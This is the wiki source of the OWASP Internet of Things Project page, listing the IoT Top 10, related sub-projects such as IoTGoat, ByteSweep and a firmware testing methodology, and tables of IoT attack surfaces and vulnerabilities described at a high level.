OWASP Internet of Things Project, wiki revision by Aaron.guzman, 2019-11-01T07:02:32Z (OWASP wiki, MediaWiki 1.27.2; user-contributions feed retrieved 2024-03-29T07:30:37Z): https://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=255839
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects, separated into three categories: Seek & Understand, Validate & Test, and Governance.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including manufacturing, consulting, security testing, development, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security], and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and that, if you alter, transform, or build upon it, you distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* New firmware security analysis tool, ByteSweep<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical use of the OWASP IoT Top 10. As with all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem.<br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Not every mapping is one-to-one; where no exact match exists, similar recommendations and/or controls are listed. For controls that do not map to any item in the IoT Top 10 2018 list, "N/A" is given as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical use of the OWASP IoT Top 10. As with all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem.<br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
<br />
= IoTGoat =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoTGoat is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project]]. IoTGoat is expected to be released by December 2019.<br />
<br />
To get more information on getting started or how to contribute, visit the project's GitHub: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
* NodeGoat<br />
* RailsGoat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
[https://groups.google.com/forum/#!forum/iotgoat IoTGoat Google Group]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ByteSweep =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ByteSweep Project ==<br />
<br />
ByteSweep is a Free Software IoT firmware security analysis platform. It allows IoT device makers, large and small, to conduct fully automated security checks on their firmware before they ship it.<br />
<br />
ByteSweep Features:<br />
* Firmware extraction<br />
* File data enrichment<br />
* Key and password hash identification<br />
* Unsafe function use detection<br />
* 3rd party component identification<br />
* CVE correlation<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ByteSweep Project? ==<br />
<br />
A Free Software IoT Firmware Security Analysis Platform.<br />
<br />
== GitLab ==<br />
https://gitlab.com/bytesweep/bytesweep<br />
<br />
== Project Leaders ==<br />
<br />
* Matt Brown<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* https://gitlab.com/bytesweep/bytesweep/blob/master/INSTALL.md<br />
<br />
|}<br />
<br />
= Firmware Security Testing Methodology =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Security Testing Methodology ==<br />
<br />
The Firmware Security Testing Methodology (FSTM) is composed of nine stages tailored to help security researchers, software developers, consultants, hobbyists, and Information Security professionals conduct firmware security assessments.<br />
<br />
{| class="wikitable"<br />
|'''Stage'''<br />
|'''Description'''<br />
|-<br />
|1. Information gathering and reconnaissance<br />
|Acquire all relevant technical and documentation details pertaining to the target device’s firmware<br />
|-<br />
|2. Obtaining firmware<br />
|Obtain firmware using one or more of the proposed methods listed<br />
|-<br />
|3. Analyzing firmware<br />
|Examine the target firmware’s characteristics<br />
|-<br />
|4. Extracting the filesystem<br />
|Carve filesystem contents from the target firmware<br />
|-<br />
|5. Analyzing filesystem contents<br />
|Statically analyze extracted filesystem configuration files and binaries for vulnerabilities <br />
|-<br />
|6. Emulating firmware<br />
|Emulate firmware files and components<br />
|-<br />
|7. Dynamic analysis<br />
|Perform dynamic security testing against firmware and application interfaces<br />
|-<br />
|8. Runtime analysis<br />
|Analyze compiled binaries during device runtime<br />
|-<br />
|9. Binary Exploitation<br />
|Exploit vulnerabilities identified in previous stages to obtain root and/or code execution<br />
|}<br />
<br />
The full methodology release can be downloaded from https://github.com/scriptingxss/owasp-fstm/releases/download/v1.0/Firmware_Security_Testing_Methodology_Version1.pdf.<br />
<br />
{{Social Media Links}} <br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Security Testing Methodology? ==<br />
<br />
The Firmware Security Testing Methodology Project provides:<br />
<br />
* Attack walkthroughs<br />
* Tool usage examples<br />
* Screenshots<br />
* Companion virtual machine preloaded with tools (EmbedOS) - <nowiki>https://github.com/scriptingxss/EmbedOS</nowiki><br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Quick Download ==<br />
* https://github.com/scriptingxss/owasp-fstm/releases<br />
<br />
|}<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and the known attacks against them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static key for encryption and decryption across devices<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing environment manipulation<br />
* Physical tampering<br />
* Physical damage<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* The storage location for update files is world-writable, potentially allowing modified firmware to be planted and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* A service can be attacked in a way that denies service to that service or to the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as the binaries (and sometimes scripts or source) of running services, pre-set passwords, SSH keys, certificates, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With a JTAG adapter and gdb, an attacker can halt the CPU, read and modify memory and registers, and alter the execution of the firmware on the device, bypassing almost all software-based security controls.<br />
* Side channel attacks (e.g. voltage or clock glitching) can likewise alter the execution flow, or be used to leak secrets such as keys from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* Connecting to a serial interface often yields full console access to the device, e.g. an unauthenticated root shell or a bootloader prompt<br />
* Common mitigations include custom bootloaders that block entry into single-user mode, but these can frequently be bypassed as well<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH servers, web servers, etc.<br />
|-<br />
<br />
|}<br />
